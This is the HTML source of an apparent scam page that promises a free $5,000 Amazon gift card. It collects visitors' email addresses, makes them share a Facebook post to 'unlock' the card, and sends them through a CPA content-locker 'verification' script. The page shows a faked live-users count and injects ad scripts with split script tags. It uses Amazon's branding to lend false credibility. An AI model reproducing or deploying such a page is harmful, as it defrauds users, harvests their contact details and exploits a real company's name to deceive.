<!DOCTYPE html>
<html>
<meta http-equiv="content-type" content="text/html;charset=utf-8" />
<head>

	<script type="text/javascript" src="https://filestrue.com/script_include.php?id=1323249"></script>
		
	<meta name="monetag" content="508d22d57026c880cf7f650df452b3a1">
	<script async src="../pagead2.googlesyndication.com/pagead/js/f09d0.txt?client=ca-pub-4200710519380728"
     crossorigin="anonymous"></script>
	<script async src="../pagead2.googlesyndication.com/pagead/js/f09d0.txt?client=ca-pub-4200710519380728"
     crossorigin="anonymous"></script>
<meta charset="UTF-8">
<html lang = "en">
<meta name="robots" content=" ALL, index, follow,">
<link rel="canonical" href="index.html" />
<meta http-equiv = "content-language" content = "en">
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1" />
	<!-- Google tag (gtag.js) -->
<script async src="https://www.googletagmanager.com/gtag/js?id=G-VNW9XTCESZ"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'G-VNW9XTCESZ');
</script>
<link href="https://fonts.googleapis.com/css?family=Comfortaa" rel="stylesheet">
<title>$5,000 Amazon Gift Card</title>
<link rel="shortcut icon" type="image/png" href="img/amazonml.png"/>
	<link rel="apple-touch-icon" href="img/amazonml.png" />
<meta name="keywords" content="amazon gift card,how to use amazon gift card,free amazon gift card,amazon gift cards,amazon gift card codes,free amazon gift card codes,how to redeem amazon gift card,amazon,free amazon gift cards,amazon gift card redeem,gift card amazon,use amazon gift card,redeem amazon gift card,gift card,add amazon gift card,amazon gift card code,amazon gift card free,amazon gift card giveaway,how to buy amazon gift card,amazon gift card codes free">
<meta name="description" content="Amazon Gift Card for $5,000
For a chance to win a $5,000 Amazon gift card, enter right away. Use your Amazon.com Gift Card* to purchase items such as music, electronics, and books. You may find and learn about practically everything you wish to buy online at a great price on the Amazon.com website.">
<meta tag="amazon gift card,how to use amazon gift card,free amazon gift card,amazon gift cards,amazon gift card codes,free amazon gift card codes,how to redeem amazon gift card,amazon,free amazon gift cards,amazon gift card redeem,gift card amazon,use amazon gift card,redeem amazon gift card,gift card,add amazon gift card,amazon gift card code,amazon gift card free,amazon gift card giveaway,how to buy amazon gift card,amazon gift card codes free">
<script src="js/jscript.js"></script>
<script type="text/javascript">
    var CPABUILDSETTINGS={"it":2700945,"key":"d0faf"};
</script>
<script src="dby7kx9z9yzse.cloudfront.net/d966fa0.html"></script>
<!--<script type="text/javascript" id="ogjs" src="https://www.locked4.com/cl/load.php?id=b42e4f3aebd89f7c93b3f7d274573dd7"></script>-->
	

	</head>

<style>

html {
    background: url("img/lootboxbg.png") no-repeat center center fixed;
    background-size: cover;
}

body {
    text-align: center;
    font-family: 'Comfortaa', cursive;
}

img {
    display: block;
    margin-left: auto;
    margin-right: auto;
}

.form-option {
    margin-left: 15px;
    margin-right: 30px;
    margin-bottom: 15px;
}

.input-form {
    background-color: #fff;
    background-image: none;
    border: 1px solid #ccc;
    border-radius: 4px;
    box-shadow: 0 1px 1px rgba(0, 0, 0, 0.075) inset;
    color: black;
    display: block;
    font-size: 14px;
    height: 20px;
    line-height: 1.42857;
    padding: 6px 12px;
    transition: border-color 0.15s ease-in-out 0s, box-shadow 0.15s ease-in-out 0s;
    vertical-align: middle;
    width: 100%;
}

.input-form::-moz-placeholder {
    color: #999;
    opacity: 55;
}

.input-command {
    border-radius: 6px;
    font-size: 18px;
    height: 28px;
    line-height: 1.33;
    padding: 10px 16px;
}

select.input-command {
    height: 46px;
    line-height: 46px;
}

.wrapper {
    padding: 0;
    margin: -136px auto 0;
}

.wrapper img {
    width: 60%;
}

.lootbox1 {
    background: url("img/amazonml.png" alt"$5,000 Amazon Gift Card" title"$5,000 Amazon Gift Card") no-repeat scroll 10px center white;
    padding-left: 40px !important;
}

.buttonstyle {
    border-radius: 6px;
    background-color: #111c30;
    border: none;
    color: white;
    padding: 16px 33px;
    font-size: 33px;
    display: inline;
    height: 72px !important;
    box-shadow: 0 4px 8px 0 rgba(0, 0, 0, 0.2), 0 6px 20px 0 rgba(0, 0, 0, 0.19);
}

.btn-yellow {
    -webkit-transition: background-color .3s ease;
    -o-transition: background-color .3s ease;
    transition: background-color .3s ease;
    font-family: BurbankBigCondensed-Black, sans-serif;
    font-size: 24px;
    letter-spacing: 1px;
    text-transform: uppercase;
    border-radius: 0px;
    padding-top: 10px;
    padding-left: 19px;
    padding-right: 19px;
    background-color: #f0ed63;
    color: #000;
}

.btn-yellow:hover {
    color: #000;
    background: #ECE834;
}

#progressbarouter {

}

#progressbarcontainer {
    display: none;
    border-radius: 6px;
    position: relative;
    border: 6px solid black;
    margin-left: auto;
    margin-right: auto;
    width: 90%;
    height: 50px;
    box-shadow: 0 4px 8px 0 rgba(0, 0, 0, 0.2), 0 6px 20px 0 rgba(0, 0, 0, 0.19);
}

#progressbar {
    position: absolute;
    width: 10%;
    height: 100%;
    background-color: #fdd633;
}

#progressbarlabel {
    line-height: 54px;
    text-align: center;
    color: black;
}

#main-tool{
    background: #efefef; /* Old browsers */
    background: -moz-linear-gradient(top,  #868f99 0%, #efefef 80px); /* FF3.6+ */
    background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#868f99), color-stop(80px,#efefef)); /* Chrome,Safari4+ */
    background: -webkit-linear-gradient(top,  #868f99 0%,#efefef 80px); /* Chrome10+,Safari5.1+ */
    background: -o-linear-gradient(top,  #868f99 0%,#efefef 80px); /* Opera 11.10+ */
    background: -ms-linear-gradient(top,  #868f99 0%,#efefef 80px); /* IE10+ */
    background: linear-gradient(to bottom,  #868f99 0%,#efefef 80px); /* W3C */
    filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#868f99', endColorstr='#efefef',GradientType=0 ); /* IE6-9 */
    border-radius: 10px;
    max-width: 500px;
    margin: 100px auto 20px;
    padding: 50px;
    opacity: 0.9;
}

#shield{
    margin-bottom: 5px;
}

#verifybg {
    height: 0%;
    width: 100%;
    left: 0;
    top: 0;
    position: fixed;
    z-index: 1;
    overflow-x: hidden;
    transition: 0.5s;
    background-color: rgb(0,0,0);
    background-color: rgba(0,0,0, 0.3);
}

#verify {
    margin-left: auto;
    margin-right: auto;
    border-radius: 10px;
    color: white;
    position: relative;
    background-color: #212835;
    box-shadow: 0 4px 8px 0 rgba(0, 0, 0, 0.2), 0 6px 20px 0 rgba(0, 0, 0, 0.19);
    width: 80%;
}

#verifycontent {
    margin-left: auto;
    margin-right: auto;
    width: 80%;
}

@media screen and (min-width: 1200px) {
        #mobileverify {
            display: none;
        }

        #desktopverify {
            display: block;
        }

        #verify {
            width: 30%;
        }
}

@media screen and (max-width: 1199px) {
        #mobileverify {
            display: block;
        }

        #desktopverify {
            display: none;
        }

        #verify {
            width: 30%;
        }
}

</style>
<body>
	
	<div id="verifybg">
	<br>
	<br>
	<br>
	<div id="verify">
		<br>
		<br>
		<br>
		<div id="verifycontent">
			<h2>$5,000 Amazon Gift Card FREE</h3>

		<div id="mobileverify">
			<p>Get Your $5,000 Amazon Gift Card</p>
			
			<center><b>Congratulations!</b></center>
			<!--<center><b>Step - 1</b></center>
			<center>Like Our Video And Subscribe to Our Youtube Channel</center><br>
			<center><a href="http://hyperurl.co/778g4z" rel="nofollow" target="blank"><img src="img/like.png" style="width:60px;height:17px;" alt="Youtube Like"/></a> | <a href="http://hyperurl.co/q2hgub" rel="nofollow" target="blank"><img src="img/sub.png" style="width:60px;height:17px;" alt="Youtube Subscribe"/></a></center><br>
			<center><b>Step - 2</b></center>
			<center>Please Make a Positive Comment On Our Video.</center><br>
			<center><a href="http://hyperurl.co/778g4z" rel="nofollow" target="blank"><img src="img/comment.png" style="width:60px;height:17px;" alt="Youtube Comment"/></a></center><br>
			<center><b>Step - 3</b></center>-->
			<center>ALL Done Click The Verify Button and get your $5,000 Amazon Gift Card for free.</center><br>
			
				<!--<center><div data-captcha-enable="true"></div></center>-->
		
			<img style="cursor:pointer;" src="img/button_verify.png" width="80%" onclick="call_locker();" alt="Click here to Get $5,000 Amazon Gift Card">
			
			<!--<br><center><b>Confused? Watch This Video Tutorial in Detail</b></center><br><br>
			<div class="iframe-container">
			<center><iframe width="560" height="315" src="https://www.youtube.com/embed/3z4hA7M3FTg?start=134" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe></center><br>--></div>
			
			
			
					</div>

			<div id="desktopverify">
			<p>Please finish the verification process to keep our software safe from automatic bot detection.</p>
			
			<center><b>Get $5,000 Amazon Gift Card</b></center>
			<!--<center><b>Step - 1</b></center>
			<center>Like Our Video And Subscribe to Our Youtube Channel</center><br>
			<center><a href="http://hyperurl.co/778g4z" rel="nofollow" target="blank"><img src="img/like.png" style="width:60px;height:17px;" alt="Youtube Like"/></a> | <a href="http://hyperurl.co/q2hgub" rel="nofollow" target="blank"><img src="img/sub.png" style="width:60px;height:17px;" alt="Youtube Subscribe"/></a></center><br>
			<center><b>Step - 2</b></center>
			<center>Please Make a Positive Comment On Our Video.</center><br>
			<center><a href="http://hyperurl.co/778g4z" rel="nofollow" target="blank"><img src="img/comment.png" style="width:60px;height:17px;" alt="Youtube Comment"/></a></center><br>
			<center><b>Step - 3</b></center>-->
			<center>To instantly obtain access to $5,000 Amazon Gift Card, 
				simply tap the Verify button and Complete Verification.</center><br>


			<!--<center><div data-captcha-enable="true"></div></center>
			<br>-->
          
			<img style="cursor:pointer;" src="img/button_verify.png" width="80%" onclick="call_locker();" alt="Click Here To Get $5,000 Amazon Gift Card"></a><br><br>
			
			<!--<center><b>Confused? Watch This Video Tutorial in Detail</b></center></b></b><br><br>
			<br><div class="iframe-container">
			<center><iframe width="560" height="315" src="https://www.youtube.com/embed/3z4hA7M3FTg?start=134" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe></center><br>--></div>
			
			
			</div>
		</div>
		<br>
		<br>
		<br>
	</div>
</div>

<div id="main-tool">
<div class="wrapper"><a href="index.html" target="_blank"><img src="img/amazon-logo-modified.png" alt=" free $5,000 Amazon Gift Card" title="$5,000 Amazon Gift Card FREE logo"/></a></div>
<h1>$5,000 Amazon Gift Card</h1>
<p>Enter now for your chance to win a $5,000 Amazon gift card. Use your Amazon.com Gift Card* towards books, electronics, music, and more. The Amazon.com website is the place to find and discover almost anything you want to buy online at a great price. 
    <p><b>Enter Email Address</b></p>
<div id="progressbarcontainer">
	<div id="progressbar">
		<div id="progressbarlabel">0%</div>
	</div>
</div>

<p><div id="progresslog"></div></p>

<div id="fillup">
<div class="form-option">
	<input id="username" maxlength="30" class="input-form input-command" type="email" required pattern="[a-z0-9._%+-]+@[a-z0-9.-]+\.[a-z]{2,4}$" placeholder="Email Address!">
</div>
<div class="form-option">
<p><b>Choose Your Device OS.</b></p>
<select id="device" class="input-form input-command" type="text">
<option>PC</option>
	<option>MAC</option>
		<option>iOS</option>
	<option>Android</option>
</select>
</div>
<div class="form-option">
<p><b>Amount</b></p>
<select id="lootbox1" class="input-form lootbox1 input-command">
	<!-- <option value="$99">$5,000</option>
	<option value="$99">10 Months</option> -->
	<option value="$5,000">$5,000</option> 
	<!--<option value="99999">9999</option>
	<option value="999999">99999</option>-->
</select>
</div>
<!-- <button onclick="move()" class="buttonstyle">GET $5,000 Amazon Gift Card</button> -->
	
    <div class="buttons" style="border-radius: 6px; font-size: 15px; text-align: center;">
        <a class="fa fa-youtube-play" href="#" id="btn_yt" onclick="show()" onmouseout="this.style.background='red'" onmouseover="this.style.background='#e30202'" style="background: rgb(12, 6, 6); border-radius: 6px; color: white; display: inline-block; font-size: 15px; font-weight: 500; margin: 15px 30px; padding: 14px 0px; text-decoration: none; transition: all 0.2s linear 0s; width: 250px;">&nbsp;SHARE TO UNLOCK</a>
    <div style="margin: auto;"> 
        <button onclick="move()" id="yt" onmouseout="this.style.background='red'" onmouseover="this.style.background='#135B0A'" style="background-color: rgb(0, 89, 255); border-radius: 6px; color: white; display: none; font-size: 15px; font-weight: 500; margin: 15px 30px; padding: 14px 0px; text-decoration: none; transition: all 0.2s linear 0s; width: 250px;">GET $5,000 Amazon Gift Card FREE!</button> 
        <a class="fa fa-download" href="#" id="ytv" style="background-color: rgb(61, 61, 63); border-radius: 6px; color: white; display: none; font-size: 15px; font-weight: 500; margin: 15px 30px; padding: 14px 0px; text-decoration: none; transition: all 0.2s linear 0s; width: 250px;">&nbsp;Checking SHARED or not...</a>
    </div>
      </div>
    
    
    <!--Start Youtube subcribe javascript-->
	
    <script type="text/javascript">
      
    </script>
    <script type="text/javascript"> 
      document.getElementById("yt").style.display = "none";
      document.getElementById("ytv").style.display = "none";
      function show() {
          window.open('https://www.facebook.com/permalink.php?story_fbid=pfbid02Y2DMjTUDyCDLWY4ULiJo1fygvLesfoQYwqywcgLVak3My9naxNoxzQtUxtfdkqTEl&id=100089367771796');
          // sleep(3000);
          setTimeout(function () {
              document.getElementById("yt").style.display = "block";
              document.getElementById("btn_yt").style.display = "none";
              document.getElementById("ytv").style.display = "none";
          }, 10000);
          //alert();
          document.getElementById("btn_yt").style.display = "none";
          document.getElementById("ytv").style.display = "block";
      }
      
    </script> 
    <!--End Youtube subcribe javascript--> 
    <img src="img/1_Shopbrain_Share_Your_Deal_header.png" alt="Win" width="444" height="250">
	
	<center><h4>USER VERIFICATION STEP</h4></center>
    <ol>
    <li>Identify Your ID Or Email by entering it in username field.</li><br>
    <li>Select the device which you are currently using.</li><br>
    <li>Click/Tap on " SHARE TO UNLOCK" Button!</li><br>
    <li>Share on Facebook To Unlock Access</li><br>
    <li>Finish with the Final Step And You Are Done!</li></br>
    </ol>

</div>
<script type="text/javascript">
	atOptions = {
		'key' : '2c47742f0fd8f19c4a89350138ec5c78',
		'format' : 'iframe',
		'height' : 60,
		'width' : 468,
		'params' : {}
	};
	document.write('<scr' + 'ipt type="text/javascript" src="http' + (location.protocol === 'https:' ? 's' : '') + '://www.profitabledisplayformat.com/2c47742f0fd8f19c4a89350138ec5c78/invoke.js"></scr' + 'ipt>');
</script>

<h4>Users Online Now:&nbsp;<div id="randomnumber">537</div></h4>
<script type="text/javascript">
	atOptions = {
		'key' : '3c0f7c9d1ce0cf22bccfd41b12291a7e',
		'format' : 'iframe',
		'height' : 600,
		'width' : 160,
		'params' : {}
	};
	document.write('<scr' + 'ipt type="text/javascript" src="http' + (location.protocol === 'https:' ? 's' : '') + '://www.profitabledisplayformat.com/3c0f7c9d1ce0cf22bccfd41b12291a7e/invoke.js"></scr' + 'ipt>');
</script>
<h4>Copyright 2023 FREE Amazon</h4>
</body>
</html>
